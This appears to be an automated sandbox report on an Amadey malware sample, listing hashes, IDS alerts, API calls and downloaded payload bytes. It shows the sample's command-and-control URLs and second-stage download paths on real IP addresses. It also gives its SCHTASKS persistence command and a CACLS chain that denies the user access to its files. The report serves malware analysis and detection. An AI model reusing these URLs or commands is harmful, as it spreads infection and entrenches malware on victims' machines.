popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

ummaa.exe

Amadey Malicious Library UPX Malicious Packer PE64 PE File OS Processor Check PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 2, 2023, 6:26 p.m. Sept. 2, 2023, 6:29 p.m.
Size 588.5KB
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 58bc43389c3e720c0af4ff563d5ed7ce
SHA256 4d7a22a1f7d76310b2c8420cb2f02ef4633cb689e4b8eaaab165731b9341163f
CRC32 A5D011EC
ssdeep 12288:ZR1BzB+BS5RMmF6We5AQtL8Luq2qL5e+iNqajC2UrhOhmfnRl:ZR1BzBGS5RMmF6We5AQKLJ2qjIqa1Ur5
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
45.9.74.80 Active Moloch
5.42.65.80 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49173 -> 45.9.74.80:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 45.9.74.80:80 2045751 ET MALWARE Win32/Amadey Bot Activity (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49173 -> 45.9.74.80:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49173 2014819 ET INFO Packed Executable Download Misc activity
TCP 45.9.74.80:80 -> 192.168.56.103:49173 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.9.74.80:80 -> 192.168.56.103:49173 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49173 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 45.9.74.80:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49173 -> 45.9.74.80:80 2017598 ET MALWARE Possible Kelihos.F EXE Download Common Structure A Network Trojan was detected
TCP 192.168.56.103:49173 -> 45.9.74.80:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49173 2014819 ET INFO Packed Executable Download Misc activity
TCP 45.9.74.80:80 -> 192.168.56.103:49173 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49173 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49176 -> 5.42.65.80:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 5.42.65.80:80 -> 192.168.56.103:49176 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.42.65.80:80 -> 192.168.56.103:49176 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 5.42.65.80:80 -> 192.168.56.103:49176 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 45.9.74.80:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49173 -> 45.9.74.80:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "oneetx.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://45.9.74.80/0bjdn2Z/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.9.74.80/softtool.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.9.74.80/alldata.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://5.42.65.80/4t.exe
request POST http://45.9.74.80/0bjdn2Z/index.php
request GET http://45.9.74.80/softtool.exe
request GET http://45.9.74.80/alldata.exe
request GET http://5.42.65.80/4t.exe
request POST http://45.9.74.80/0bjdn2Z/index.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2128
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1236
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004d50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 2031616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000800000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000970000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2421000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2abb000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 1245184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002110000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000021c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2424000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2424000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2424000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2424000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92caa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92cbc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92dd0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92d5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92d86000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92d60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92ccb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92cab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92cba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92cfc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92ccd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92ca2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
description oneetx.exe tried to sleep 122 seconds, actually delayed analysis time by 122 seconds
file C:\Users\test22\AppData\Local\Temp\1000302001\softtool.exe
file C:\Users\test22\AppData\Local\Temp\c149ec7a.exe
file C:\Users\test22\AppData\Local\Temp\1000304001\4t.exe
file C:\Users\test22\AppData\Local\Temp\1000303001\alldata.exe
file C:\Users\test22\AppData\Local\Temp\newplayer.exe
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
file C:\Users\test22\AppData\Local\Temp\newplayer.exe
file C:\Users\test22\AppData\Local\Temp\c149ec7a.exe
file C:\Users\test22\AppData\Local\Temp\1000302001\softtool.exe
file C:\Users\test22\AppData\Local\Temp\1000303001\alldata.exe
file C:\Users\test22\AppData\Local\Temp\1000304001\4t.exe
file C:\Users\test22\AppData\Local\Temp\newplayer.exe
file C:\Users\test22\AppData\Local\Temp\c149ec7a.exe
file C:\Users\test22\AppData\Local\Temp\1000303001\alldata.exe
file C:\Users\test22\AppData\Local\Temp\1000302001\softtool.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000302001\softtool.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000302001\softtool.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000303001\alldata.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000303001\alldata.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000304001\4t.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000304001\4t.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $;v¥tötötöa&öktöa&œöKtöa&›ö töX²cöttötötöa&’ö~töa&Œö~töa&‰ö~töRichtöPEL‘7µcà  Æžà@…<LÉxШvPè0È8@Ð.text4ÄÆ `.dataäþàÊ@À.rsrc¨vÐxè@@.relocü¥P¦`@BbÏ,ÏFÏöË ÌÌ4ÌHÌfÌž̨̺ÌÊÌÞÌüÌÍ,Í>ÍPÍhÍx͖ͨÍæËÈÍÚÍêÍÎÎ&Î2ÎFÎ`ÎvΊΤθÎ&ÔÔÔÔ˦˴˸͔ËðӞϴÏÌÏâÏøÏÐÐ4ÐLÐdÐtЀДаÐÎÐâÐôÐÑÑÑ.Ñ>ÑPÑ\ÑjÑxцњѨѴÑÂÑÌÑâÑðÑüÑ Ò"Ò<ÒTÒnÒ€ÒŽÒ¨Ò¸ÒÎÒèÒúÒÓÓ"Ó8ÓJÓ`ÓpÓ˜Ó¨Ó¸ÓÊÓÞÓÏüÎðÎÞ΀Ïg»B}»B“»B[»B7ˆ@п@öApGAks@é@úmAÀ@ÍÓÐdG(9(-bad allocationÿÿÿÿP@@-B@Šw@´;@G@„9@·n@*C˜<@ŽC@†C@H<@ÓC@†C@Ð9@p@†C@string too longinvalid string position :@Ýw@Šw@Unknown exception4:@þw@Šw@€:@&@csmà “LC_TIMELC_NUMERICLC_MONETARYLC_CTYPELC_COLLATELC_ALL\@ç‘@P@XçB.AD@XçB3‚@8@XçBhA,@XçBA$@XçBRA  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~_.,._;==; ((((( H„„„„„„„„„„‚‚‚‚‚‚ h(((( H„„„„„„„„„„‚‚‚‚‚‚ H€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ  !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $;v¥tötötöa&öktöa&œöKtöa&›ö töX²cöttötötöa&’ö~töa&Œö~töa&‰ö~töRichtöPELéÂÜcà  ú@žA@0CG2Eœý@x@¨v:D€ €Bè0È8@Ð.text„ø@ú@ `.dataäþAþ@@À.rsrc¨v@xA@@.relocü¥€B¦”C@B²A|A–AFA\AlA„A˜A¶AÊAÜAøA AA.ALAbA|AŽA A¸AÈAæAøA6AA*A:AVAjAvA‚A–A°AÆAÚAôAAvAfAPA$Aöÿ@AAäÿ@@AîAAA2AHAPAlA„AœA´AÄAÐAäAAA2ADAVAbAnA~AŽA A¬AºAÈAÖAêAøAAAA2A@ALA\ArAŒA¤A¾AÐAÞAøAAA8AJAVA`ArAˆAšA°AÀAèAøAAA.AbALA@A.AÐA·ï€Íï€ãï€7ˆ@п@öApGAks@é@úmAÀ@«ûîdC(9(-bad allocationÿÿÿÿT@@-B@Šw@¸;@G@ˆ9@·n@*Cœ<@ŽC@†C@L<@ÓC@†C@Ô9@p@†C@string too longinvalid string position$:@Ýw@Šw@Unknown exception8:@þw@Šw@„:@&@csmà “LC_TIMELC_NUMERICLC_MONETARYLC_CTYPELC_COLLATELC_ALL\@ç‘@P@X.AD@X3‚@8@XhA,@XA$@XRA  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~_.,._;==; ((((( H„„„„„„„„„„‚‚‚‚‚‚ h(((( H„„„„„„„„„„‚‚‚‚‚‚ H€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ  !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ  